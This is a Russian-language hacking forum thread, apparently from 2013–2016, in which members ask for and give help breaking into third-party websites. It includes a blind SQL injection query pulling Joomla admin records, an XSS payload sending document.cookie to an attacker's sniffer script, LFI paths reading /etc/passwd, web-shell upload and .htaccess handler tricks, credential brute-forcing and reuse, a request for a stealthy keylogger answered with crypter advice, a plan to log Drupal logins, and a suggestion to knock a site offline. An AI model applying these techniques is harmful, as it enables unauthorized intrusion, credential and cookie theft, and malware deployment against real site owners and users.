Просмотр полной версии : [Задай Вопрос - Получи Ответ]
Подскажите, а что, нет способа убрать суффикс в Local File Inclusion в PHP 5.3.3? Переполнение и нулевой байт не работают
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
select * from jos_users where usertype= 'Super Administrator';
[B]Joomla
[QUOTE="BigBear"]
select * from jos_users where usertype= 'Super Administrator';
[B]Joomla
winstrool
19.11.2013, 22:40
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
как поставели вопрос, такой получили и ответ!
скуля блиндовая, невыйдет. Есть другие способы?
Так и запрос составте под блинд, посимвольно и выдергивайте:
and(select ascii(mid(concat(username),1,1))>40 from jos_users where usertype=0x53757065722 041646D696E6973747261746F72 limit 0,1) --
KroSaver
27.12.2013, 14:52
Здраствуйте.
Какими способами можно распознать движок сайта?
Здравствуйте!
Подскажите, пожалуйста, что за движок?
drdre5.ru
PS нашёл. это бм Shop
fakecoder
15.01.2014, 09:14
Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?
В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms
Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?
В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms
Если вам очень повезет - найдете на каких-нибудь файлопомойках. Вообще это такая самопальная цмска, которую впаривают как "разработку сайта".
Есть маленькое overview:
http://www.sitesapiens.ru/site_sapiens_description.pdf
В таких случаях, как правило, только получив шелл\чтение на одном из сайтов.
UPD: Иногда в таких случаях удается развести авторов на демку этой цмс, попробуйте написать им, прикинувшись потенциальным клиентом.
есть ли какие слабости у 1С-битрикс Управление сайтом
согласен на платный приват
есть ли какие слабости у 1С-битрикс Управление сайтом
согласен на платный приват
Версия какая? Скриншот /bitrix/admin хотя бы.
Кто слышал про GomyeCMS и про её уязвимости? Нашел только одно, и та на китайском. при переводе получается ужасно.
Наткнулся на скулю в сайте одного хостинга, сам сайт - почти не дышит, админка в 403. Полагаю, что сайт банально переехал, так как по другому домену отзывается и вообще там все очень хорошо. Но БД старого сайта существует до сих пор и в ней есть таблица
Servers
. Колонки следующие:
ServerID, Active, DateAdded, ServerName, PleskPassword, PleskUserName, SuspendCommand, ControlPanelURL, SharedIPAddress, UnSuspendCommand, SuspendCommandResult, PrimaryDNSServerName, UnSuspendCommandResult, SecondaryDNSServerName, PrimaryDNSServerIPAddress, SecondaryDNSServerIPAddress, AlternativePrimaryDNSServerName, AlternativeSecondaryDNSServerName, AlternativePrimaryDNSServerIPAddress, AlternativeSecondaryDNSServerIPAddress
Также есть таблица
SystemUsers
с колонками:
SystemUserID, SystemUser, SysUserName, Active, ClientAccountLogin, SysPassword
Собственно, есть
url, username, password
для панели Plesk-а. Но под ними отказывается заходить, возможно поменяли все пароли.
Если у кого-то есть какие-либо соображения по этой теме - пожалуйста, не проходите мимо, спрашивайте/указывайте.
Вы все пары логин:пасс проверили? Попробуйте с ними достучаться на другие сервисы, ftp, ssh, sql, если открыты. Поищите что-нибудь вроде phpma где-нибудь рядом. В общем, ищите все, куда можно вбить логин:пасс и вбивайте. Также есть смысл залиться на сервак через соседние сайты и попробовать поднять локально через известные пароли.
Да, открыты ftp, ssh, но по ним тоже не подходят пароли. Заметил в БД огрызки WP, там 2 юзера, сейчас их пароли стоят на бруте.
В общем-то собрал небольшую пачку логинов/паролей (кроме тех, которые генерирует Plesk), сейчас эти добрутятся и буду ломиться везде. Дело в том, что этот сайт ссылался на ресурсы "основного" сайта, которые живы и сейчас. Дат нет, поэтому актуальность паролей сложно назвать. Еще и domain : email : psswd, которые лежат в таблице Domains, не подходят на этом самом живом сайте.
Спасибо за ответ, буду пробовать еще и через соседние ломиться.
Знакомая ситуация. Могу посоветовать немного рандомизировать пароли с помощью crunch или cupp. Даты можно косвенно выцепить из версий софта. Также иногда помогают exif-данные загруженных картинок или last-modified заголовки на некоторые страницы.
student96
12.02.2014, 20:00
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Password: 383256
MD5(383256): 371425ff7acc4360c86d097ebe9eb082
скорее всего бекдор
я слышал что в базах некоторых интернет-шопов хранится информация о карточках,
которую продают, Что она вообще из себя представляет?
Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.
Алерт отлично отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//
Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//
Даже банальная переадресация, также не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//
Подскажите пожалуйста, в чем может быть причина?
Вообщем такая проблема захожу на сайт в админку.Там есть кнопка администрирования и меня перекидывает ***.ru/admin.php и просто пустая страница, такая же фигня есле же пишу вместо сайта его ip/phpmyadmin просто пустая формаю, может какая защита
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Это троян в теме. Тут (http://it-notes.ru/wordpress-pagehash-wordpressslog.html) вкратце есть об этом
Unknowhacker
17.04.2014, 10:40
Есть шелл на сайте, которого использует webAsyst, подскажите пожалуйста в каком файле лежат данные администратора.
Можно ли в Joomla 1.0.* авторизоваться в админку, если есть session_id администратора?
Требуется подправить скрипт авторизации в drupal 6+, чтобы сохранялись данные авторизаций в файлике или отсылались на почту. Я так понимаю править нужно modules/user/user.module . Но что то неполучается все правильно сделать, ошибку сайт выдает, при попытке авторизации. Как правильно все настроить?
xobbitua
19.11.2014, 14:02
Как проверить сразу несколько URL на редирект?
Подскажите плиз шаровые или трайал сервисы, чтобы проверить сразу 63 линка на редирект? Нижеуказанный умеет расшифровывать Ютубовские скриптовые коды вида youtube.com/channel/UCAXxzBq3dfQ+V3FN501aMlw, а большинство бесплатных - нет Sad
Если надо проверить редирект отдельных страниц: на сайте сервисов http://try.seoimage.com/check-server-header-check-redirects-tool/ - можно попробовать, но взломать форму я не смог
под какие версии phpmyadmin есть брутфорс программы?
Где в БД Drupal найти адрес сайта?
Где в БД Drupal найти адрес сайта?
https://rdot.org/forum/showthread.php?t=1990
SELECT value FROM variable WHERE name='site_name'
Kolyan333
18.01.2015, 01:56
либо голова не варит либо туплю , есть активка вставляю скрипт, не выполняеться, а в исходнике вижу что мешают символы
">img = new Image(); img.src =\"http://site.ru4_1.gif?\"+document.cookie; как их закодировать? пробовал base не катит
d4rk73rr0r
09.04.2015, 17:00
Здравствуйте уважаемые... есть доступ на ipb 3.4.6 и DLE 10 лицензионный версия, вопрос как залить шелл? в гуглах не нашел нечего подобного. Попробовал как написано здесь (https://rdot.org/forum/showpost.php?p=1344&postcount=4), 1ый, 2ой варианты не помогла. второй способ тоже не получается. Помогите залить шелл. просто не хочу рискнуть и потерять оба сайта ))) заранее спасибо за ответь !!!
↑ (https://antichat.live/posts/3836285/)
Здравствуйте уважаемые... есть доступ на ipb 3.4.6 и DLE 10 лицензионный версия, вопрос как залить шелл? в гуглах не нашел нечего подобного. Попробовал как написано
здесь (https://rdot.org/forum/showpost.php?p=1344&postcount=4)
, 1ый, 2ой варианты не помогла. второй способ тоже не получается. Помогите залить шелл. просто не хочу рискнуть и потерять оба сайта ))) заранее спасибо за ответь !!!
в личку доступ.
Нашел уязвимость.
Вытащил из пачки сайтов примерно вот такие данные:
[LIST=1]
[QUOTE="StiXy24"]
↑ (https://antichat.live/posts/3837517/)
Нашел уязвимость.
Вытащил из пачки сайтов примерно вот такие данные:
[LIST=1]
↑ (https://antichat.live/posts/3837520/)
везде Localhost ? только пробовать приконнектиться к бд, через вытащенные данные. попробуй найти сперва phpmyadmin или админер на этих серверах. Если нет, то пробуй подключиться к ним внешне
забыл уточнить, все сайты на wordpress
↑ (https://antichat.live/posts/3837531/)
забыл уточнить, все сайты на wordpress
Ну попробуй зайти в myadmin сделай юзера, залей шелл и вауля.
Если myadmin нету, то попробуй через внешнее подключение приконнектится, хотя маловероятно, но пытка не пытка)
Доброго дня!
Есть уязвимость LFI в Magento plugin Magmi.
http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility (http://www.site.co.uk/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../home/site/public_html/shop/mage&plugintype=utilities&pluginclass=CustomSQLUtility) файл mage читается.
http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility (http://www.site.co.uk/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility)
файл passwd читается.
http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility (http://www.site.co.uk/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../home/site/public_html/shop/index.php&plugintype=utilities&pluginclass=CustomSQLUtility)
а вот так с расширением php либо любым другим не читается.
Как прочесть?
Forserer
20.08.2015, 10:37
Какую информацию можно посмотреть по уязвимостям Stress Web желательно версии 13
Kolyan333
28.08.2015, 01:10
ситуация такая
есть csfr
Личные данные:
Имя:
Фамилия:
Дата рождения:
и как здесь включить если нету name в post запросе у меня в html коде
↑ (https://antichat.live/posts/3837520/)
везде Localhost ? только пробовать приконнектиться к бд, через вытащенные данные. попробуй найти сперва phpmyadmin или админер на этих серверах. Если нет, то пробуй подключиться к ним внешне
А как найти phpmyadmin если везде написано localhost? мб есть, где почитать на эту тему?
↑ (https://antichat.live/posts/3893969/)
А как найти phpmyadmin если везде написано localhost? мб есть, где почитать на эту тему?
Сканерами директорий искать. В разделе софт ArxScanSite например.
есть доступ к админке DLE 10, какие актуальные способы существуют залитие шелла?
Такой вопрос. Получается залить шелл, но при заходе на него site/shell.php он не открывается, а скачивается на комп. Почему так и как это победить?
↑ (https://antichat.live/posts/3894171/)
Такой вопрос. Получается залить шелл, но при заходе на него site/shell.php он не открывается, а скачивается на комп. Почему так и как это победить?
.htaccess так настроен, попробуйте поиграть с расширениями шелла (php3,php4,php5,phtml) или попробуйте перелить штаку в директорию с шеллом.
↑ (https://antichat.live/posts/3894206/)
.htaccess так настроен, попробуйте поиграть с расширениями шелла (php3,php4,php5,phtml) или попробуйте перелить штаку в директорию с шеллом.
php3 4 5 - не загружает, phtml грузит, но не исполняет, а загружает. htaccess загружается, но не помогает
с таким содержимым htaccess
AddType application/x-httpd-php .bit
AddHandler application/x-httpd-php .bit
↑ (https://antichat.live/posts/3894212/)
php3 4 5 - не загружает, phtml грузит, но не исполняет, а загружает. htaccess загружается, но не помогает
с таким содержимым htaccess
AddType application/x-httpd-php .bit
AddHandler application/x-httpd-php .bit
Значит нужная штака на уровень выше. Как реагирует на shtml?
↑ (https://antichat.live/posts/3894214/)
Значит нужная штака на уровень выше. Как реагирует на shtml?
Залился. При открытии виден шелл с кусками кода при этом открывается окошко с сообщением Error! Can't open file можно нажать только OK при нажатии ОК все пропадает.
↑ (https://antichat.live/posts/3894233/)
Залился. При открытии виден шелл с кусками кода при этом открывается окошко с сообщением Error! Can't open file можно нажать только OK при нажатии ОК все пропадает.
Почитайте немного про shtml шелл. Если все перепробовали, скиньте в личку, поссмотрю.
↑ (https://antichat.live/posts/3894280/)
Почитайте немного про shtml шелл. Если все перепробовали, скиньте в личку, поссмотрю.
написал в личку, глянь плз.
batko_oo
27.09.2015, 13:40
на одном из форумах стоит установочный mysql
http://sayt.ua/phpmyadmin/setup/index.php
но там висит предпруждения
Невозможно загрузить или сохранить настройки
Пожалуйста, создайте на сервере в корневой директории phpMyAdmin каталог config и установите у него разрешение на запись, как описано в документации. В противном случае вы сможете только скачать, или просмотреть его.
можно там ковыряться ? или же ничего не выйдет ?
Есть доступ к админке на drupale. Слышал есть возможность получить доступ к файлам через админку и скопировать их не имею доступа к фтп. Кратко подскажите как?
не ужели ни кто не знает?
Вечер добрый подскажите,пожалуйста,с чего начать для изучения уязвимостей? Достаточно ли только этого форума или есть дочерние сайты,где я бы мог набраться опыта и научиться вашему рукоделию?
Помогите в создание сайта, с чего начать, вообще ни чего не знаю толком, но большое желание начать)
Тоже хочу научится) Старничёк я с тобой )
↑ (https://antichat.live/posts/3911588/)
Вечер добрый
подскажите,пожалуйста,с чего начать для изучения уязвимостей? Достаточно ли только этого форума или есть дочерние сайты,где я бы мог набраться опыта и научиться вашему рукоделию?
Заранее извиняюсь, если не туда запостил.
В соседнем топике, что посвящен обзору уязвимостей wordpress, некоторое время тому назад был задан вопрос, а именно:
/threads/50572/page-16#post-3841830 (https://antichat.live/threads/50572/page-16/)
(Как использовать эксплойт)
На что был получен ответ:
/threads/50572/page-16#post-3841833 (https://antichat.live/threads/50572/page-16/)
(нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php)
Дабы не засорять тему, в которой обсуждался данный момент, решил спросить здесь.
Прошу, если кому не сложно, объяснить и озвучить точный порядок действий именно на вышеописанном примере. Казалось бы суть ясна, однако самостоятельное понимание наверное уже невозможно по причине того, что я все-таки похоже дно Итак его и эдак и в хвост и в гриву как говорится, но все тщетно. Чую, что совершаю какую-то фундаментальную ошибку...
↑ (https://antichat.live/posts/3918128/)
Тоже хочу научится) Старничёк я с тобой )
да пожалуйста,только надо,чтобы нам хотя бы направление дали,а то так можно все перечитать ,а толку ноль!)
↑ (https://antichat.live/posts/3919447/)
да пожалуйста,только надо,чтобы нам хотя бы направление дали,а то так можно все перечитать ,а толку ноль!)
С этим я согласен! Telegram есть у тебя?
Privetiqq
26.11.2015, 19:38
У кого есть толковый кейлоггер безплатный не очень палевный с отсылкой на мыло или фтп логов с клавы и (желательно) звук/фото с вебки? Гуглю день что не найду то либо платное либо паленое очень либо не работает вовсе( Триалок ненадо, радмин не предлагать, у жертвы и так стоит :-D
привет.
на сайте админка реализована через Oauth (vk)
есть что почитать на эту тему?
советы может
Как узнать IP адрес сервера интернет провайдера? Например Ростелеком или любого другого. Гугл тишина. Знаю только что IP постоянный, т е не меняется.
Dart_Siri
30.01.2016, 12:00
Всем Привет,как узнать через google версию CMS и саму CMS?
nikname555
02.02.2016, 05:40
Доброго времени суток!
Как узнать версию CMS Bitrix?
Спасибо!
powerOfthemind
09.02.2016, 19:04
↑ (https://antichat.live/posts/3920388/)
У кого есть толковый кейлоггер безплатный не очень палевный с отсылкой на мыло или фтп логов с клавы и (желательно) звук/фото с вебки? Гуглю день что не найду то либо платное либо паленое очень либо не работает вовсе( Триалок ненадо, радмин не предлагать, у жертвы и так стоит :-D
fuckav.ru тут смотри, а что б не палился крипторы тебе в помощь. Рекомендую тестить все на виртуалке.
oskantime
10.02.2016, 15:29
есть задача. подготовить отчет об уязвимости определенного сайта и предложения по повышению безопасности. это не должен быть просто выгруженный из сканера файл, а действительно отчет с пояснениями. оплата. если интересует в приват
↑ (https://antichat.live/posts/3947731/)
Доброго времени суток!
Как узнать версию CMS Bitrix?
Спасибо!
здесь бывает нарисовано
http://www.site.ru/bitrix/admin/index.php
1С-Битрикс: Управление сайтом 10.0.1. © 2002 Битрикс, 2007 1С-Битрикс
или примерно можно определить по году релиза
Битрикс: Управление сайтом. © 2002-2006 Битрикс
или (в некоторых случаях) - http://www.site.ru/bitrix/updates/updater.log (только это в очень старых версиях - сейчас то и папки такой нет )
если есть доступ к админке - то в разделе обновления
Dr.Silent
26.02.2016, 00:51
Всем привет, возможно я покажусь клоуном, но хотелось бы услышать ответ от опытных юзеров.
С чего начать свой путь?
Да я могу сливать бд через sql dumper, но хочется развиваться, я уверен есть много тем на форуме, чтобы начать с азов. К примеру тему о заливке шелла и прочее, то есть именно где можно почитать и вникнуть, заранее спасибо
Jopashnik
26.02.2016, 13:00
Помогите плз, есть сайт на нем я думаю есть софт. Нужна ссылка на софт, есть два сайта, один , на втором есть зипы, но не тот софт что нужен. Нужен ause, помогите плз
Если ты ищешь на сайте ausee.ru/main, то его там нету, там ведут ссылки на 2 сайт, I-tt.ru
hxxp://ausee.ru/url/hxxp://www.i-tt.ru/soft/ause.html (http://www.i-tt.ru/soft/ause.html)
А по ссылки
hxxp://www.i-tt.ru/soft/ause.html (http://www.i-tt.ru/soft/ause.html)
Часто задаваемые вопросы по роботу AuSeесть ссылка
hxxp://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf (http://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf)
И в завершении качай
hxxp://www.i-tt.ru/soft/AuSe/AuSe.zip
Jopashnik
28.02.2016, 22:57
↑ (https://antichat.live/posts/3957521/)
Если ты ищешь на сайте , то его там нету, там ведут ссылки на 2 сайт,
hxxp:/
А по ссылки
hxxp://
.html (http://www.i-tt.ru/soft/ause.html)
Часто задаваемые вопросы по роботу AuSe
есть ссылка
hxxp://
www..pdf (http://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf)
И в завершении качай
hxxp://.zip
Спс!! Я люблю тебя Вот не поверишь смотрел я в этой папке файл, затупил и все мелкими буквами написал..
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии
Теперь вопрос, как залить нормальный шелл?
phpinfo при помощи запроса http://site.com/shell-image.gif?cmd=phpinfo(); не показывается
Попробовал на своем хостинге промутить, тоже ничего не получилось.
BabaDook
11.03.2016, 11:30
↑ (https://antichat.live/posts/3961973/)
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии
Теперь вопрос, как залить нормальный шелл?
phpinfo при помощи запроса
http://site.com/shell-image.gif?cmd=phpinfo();
не показывается
Попробовал на своем хостинге промутить, тоже ничего не получилось.
Пожалуйста, попробуйте сделать так
http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)ls or http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)whoami если ничего не выполняется возможно вы забыли про Эйчтиассес
↑ (https://antichat.live/posts/3961993/)
Пожалуйста, попробуйте сделать так
http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)
ls or
http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)
whoami если ничего не выполняется возможно вы забыли про Эйчтиассес
Ничего не выводится, все также открывается просто картинка
BabaDook
11.03.2016, 11:55
↑ (https://antichat.live/posts/3962003/)
Ничего не выводится, все также открывается просто картинка
Так посмотрите , вы картинку залили , возможно с кодом, но она обрабатывается как картинка, код не обрабатывается
Помогите разобраться. Просканировал сайт сканером w3af-ом он выдал следующее:
eval() input injection was found at: "http://site.com/index.php", using HTTP method
POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
10651, 10734 and 10837.
eval() input injection was found at:
"http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
HTTP method POST. The sent post-data was:
"...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRle C5waHA/YXBwPWNvcmU..." which
modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
with ids 10510, 10580, 10654, 10760 and 10873.
Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.
BabaDook
11.03.2016, 17:35
"]
[XOR] said:
↑ (https://antichat.live/posts/3962113/)
Помогите разобраться. Просканировал сайт сканером
w3af
-ом он выдал следующее:
eval() input injection was found at: "http://site.com/index.php", using HTTP method
POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
10651, 10734 and 10837.
eval() input injection was found at:
"http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
HTTP method POST. The sent post-data was:
"...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRle C5waHA/YXBwPWNvcmU..." which
modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
with ids 10510, 10580, 10654, 10760 and 10873.
Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.
Возможно, . w3af бывает чудит, однако лучше ручкаи проверить
"]
[XOR] said:
↑ (https://antichat.live/posts/3962113/)
Помогите разобраться. Просканировал сайт сканером
w3af
-ом он выдал следующее:
eval() input injection was found at: "http://site.com/index.php", using HTTP method
POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
10651, 10734 and 10837.
eval() input injection was found at:
"http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
HTTP method POST. The sent post-data was:
"...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRle C5waHA/YXBwPWNvcmU..." which
modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
with ids 10510, 10580, 10654, 10760 and 10873.
Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.
может что то такое проканает
do=echo "test";exit;//
do=;echo "test";exit;//
do= && echo "test";exit;//
etc
в урл энкод только надо обернуть
phpinfo в редких случаях может быть например отключена
↑ (https://antichat.live/posts/3961973/)
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии
Теперь вопрос, как залить нормальный шелл?
phpinfo при помощи запроса
http://site.com/shell-image.gif?cmd=phpinfo();
не показывается
Попробовал на своем хостинге промутить, тоже ничего не получилось.
ну если бы гифки выполнялись как пхп это было бы ммм ^_^
как проверить выполняется код или нет? скачай свою гифку с сайта, открой в блокноте, видишь пхп код? если да значит он стопудово не выполнился, если не видишь - значит он либо выполнился, либо порезался на этапе загрузки
по дефолту конечно он выполнятся не будет, вообще в большинстве случаев запрос даже не дойдет до апача->пыхи, картинку отдаст nginx( который сейчас используется почти везде )
даже если запрос дойдет таки до апача, оный должен понять как обработать файл, для это есть хендлеры, в манах есть примеры
https://httpd.apache.org/docs/2.2/ru/handler.html
как правильно сказал BabaDook (https://antichat.live/members/263150/) нужно подредактировать .htaccess, добавив хендлер для своего шелла
user6334
30.03.2016, 20:39
Подскажите, тут кто-нибудь писал про уязвимости Ruby on rails?
Вопрос такой - Можно ли в код яндекс метрики спрятать шелл?
blackhead
02.04.2016, 20:15
Подскажите по движку typo3 (версия TYPO3 4.5 CMS). В базе есть таблицы be_users и fe_users, но логины и пароли к админке (cайт/typo3/index.php) не подходят. Кто знаком с typo3 подскажите!
adamabakumov
05.04.2016, 23:45
Есть сайт на немного странном php фреймворке fuelPHP. Сайт онлайн, доступа нету. Нашел такие уязвимости http://fuelphp.com/security-advisories и http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1999. Звучит так "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response." Как проверить имеет ли сайт уязвимость (актуальна ли версия фреймворка). Где можно почитать про эксплуатацию подобного рода уязвимостей?
↑ (https://antichat.live/posts/3970652/)
Есть сайт на немного странном php фреймворке fuelPHP. Сайт онлайн, доступа нету. Нашел такие уязвимости
http://fuelphp.com/security-advisories
и
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1999
. Звучит так "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response." Как проверить имеет ли сайт уязвимость (актуальна ли версия фреймворка). Где можно почитать про эксплуатацию подобного рода уязвимостей?
Для эксплуатации уязвимости нужно знать пхп. Если ты его не знаешь или не имеешь опыта создания сайтов на пхп то использовать уязвимость не получится. Если знаешь то нужно скачать уязвимую верси fuelphp, открыть исходники, на локалхосте изучить уязвимость и опробовать её. Дальше имея опыт эксплуатации уязвимости в лабораторных условиях можешь сделать попытку эксплуатации на рабочем сайте. И если будет успех то вообще можешь эксплоит для этой уязвимости сделать и будешь крут.
adamabakumov
06.04.2016, 00:51
PHP знаю, но с данным фреймворком не работал. Вот времени правда мало. Можно ли узнать версию фреймворка? Что можно почитать по теме?
Необходима помощь в поиске адмнки - aeuso.org.
↑ (https://antichat.live/posts/3974307/)
Из-за косяка сайта
http://vk.com/
некоторые закрытые фотографии (УДАЛЁННОГО уже в ВК аккаунта) были загробастаны двумя недобросовестными сайтами. Google удалить их из индексации не желает, а поддержка ВК зашилась. Фотографии надо зачистить из индексации или из этих грабберов.
Что стоит предпринять в этом случае?
При долгосрочном оффлайне сайта он удаляется или понижается в индексации, атаковать сайт долгосрочно, есть вариант сделать от лица юрисдикции еще, но это уже в зависимости от владельцев сайтов, если испугаются - то удалят, если не испугаются и пошлют - шанс того что ты заставишь их даже через суд удалить эти фотографии очень мал.
Ребят, а кто-то может помочь с sql-inj? Есть сайт, там ссылка типа /index.php?pageid=456. Если вставить кавычку или дописать что-то, отличное от пробела и отправить запрос, то в ответ придет пустая страница с текстом Incorrect url. Если сделать запрос вида /index.php?pageid=456 AND 1=1, то вернется ошибка 403 Forbidden.
Кто-то знает, что за ересь там происходит? Это waf? Что делать в таком случае?
Как на практике можно использовать уязвимость Arbitrary File Download?
Т.е. Насколько серьёзной она является и чего можно добиться. Ну к примеру на Wordpress: я нашёл уязвимые сайты, смогу получить wp-config.php. Есть логин:пароль к БД, сервер. А дальше как? Можно как-то эти данные применить? Чего можно достичь? Хочется конечно свой скрипт php загрузить/записать на сервер. Но как?
Обычно хостер не позволяет подключение к серверу БД со стороннего хоста. В этом случае всё?
Если позволяет, то максимум что соображаю создать пользователя с правами админа и редактировать шаблон, но палевно же.
blackbox
27.04.2016, 20:52
↑ (https://antichat.live/posts/3978483/)
Как на практике можно использовать уязвимость Arbitrary File Download?
Т.е. Насколько серьёзной она является и чего можно добиться. Ну к примеру на Wordpress: я нашёл уязвимые сайты, смогу получить wp-config.php. Есть логин:пароль к БД, сервер. А дальше как? Можно как-то эти данные применить? Чего можно достичь? Хочется конечно свой скрипт php загрузить/записать на сервер. Но как?
Обычно хостер не позволяет подключение к серверу БД со стороннего хоста. В этом случае всё?
Если позволяет, то максимум что соображаю создать пользователя с правами админа и редактировать шаблон, но палевно же.
Phpmyadmin можно найти попробовать и залогинится с этими данным. Ну банальщина вроде попытки использовать эти данные для других сервисов. Ну и конечно скачивание конфигов и других потенциально полезных файлов, в том числе чтобы новые зацепки найти. Такое вот.
Прошу прощения, что вмешиваюсь, а на мой вопрос кто-то может ответить, пожалуйста? Я уверен, что тут есть знающие люди. Очень интересно узнать, в чем проблема.
↑ (https://antichat.live/posts/3978488/)
Phpmyadmin можно найти попробовать и залогинится с этими данным. Ну банальщина вроде попытки использовать эти данные для других сервисов. Ну и конечно скачивание конфигов и других потенциально полезных файлов, в том числе чтобы новые зацепки найти. Такое вот.
Спасибо. За phpmyadmin я как-то забыл, ну а с его помощью файлы php можно создать разве? Хотя не обязательно: тут уже можно пользователя создать с адм. правами, а дальше уже...
Другие файлы по ходу на ВП сайте ничего полезного не несут.
Но как вариант ещё на ФТП с теми же данными попробовать, как Вы посоветовали.
↑ (https://antichat.live/posts/3978726/)
Прошу прощения, что вмешиваюсь, а на мой вопрос кто-то может ответить, пожалуйста?
Мало данных от Вас. Судя по написанному - кавычки нет в запросе перед AND. Точно не знаю, но вроде там ещё надо ставить знак комментария /* в самом конце.
Дальше: может быть просто банально защита через .htaccess от "опасных" запросов. Поведение движка, если это движок такое.
Много чего может быть.
↑ (https://antichat.live/posts/3978869/)
Мало данных от Вас. Судя по написанному - кавычки нет в запросе перед AND. Точно не знаю, но вроде там ещё надо ставить знак комментария /* в самом конце.
Дальше: может быть просто банально защита через .htaccess от "опасных" запросов. Поведение движка, если это движок такое.
Много чего может быть.
Понятно, большое спасибо. Хм... Мда, буду пробовать.
Да, действительно, traan прав. Не было кавычки перед AND. Хотя дело оказалось в комментарии в самом конце.
Получается, что /index.php?pageid=451 AND 1=1 /* и /index.php?pageid=451' AND 1=1 /* выдают одинаковый результат. Если коммент убрать, то выдаст 403, а так пишет, что Incorrect url.
Интересно, получится ли что-то выжать...
traan, спасибо!
Ребят, нашел на своем сайте уязвимость. В бд можно записать любую строчку, и потом в одном месте он выводит данные из бд не фильтруя. Т.е XSS есть(алерт пишется,выводится и срабатывает). Скоро исправлю.
Но меня больше интересует SQL инъекция. сейчас фильтруются все кавычки(комментируются обратным слешем, аж 4 шт, хз зачем)
пример пр вводе ' UNION SELECT 1:
purch='\\\\' UNION SELECT 1'
Этого достаточно чтоб не было инъекции?
Можно пример когда это не поможет? (надо )
PS двиг куплен у фрила.
Коллеги, подскажите какой-нибудь сайт, аналогичное cve\.mitre\.org что бы там фиксировались все (ну или почти все) уязвимости на джумлу и друпал. Хотелось бы для мониторинга уязвимостей.
Спасибо!
↑ (https://antichat.live/posts/3981348/)
